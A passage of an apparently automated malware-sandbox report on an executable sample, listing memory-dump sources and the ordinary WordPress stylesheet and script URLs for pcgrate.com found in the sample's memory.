00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 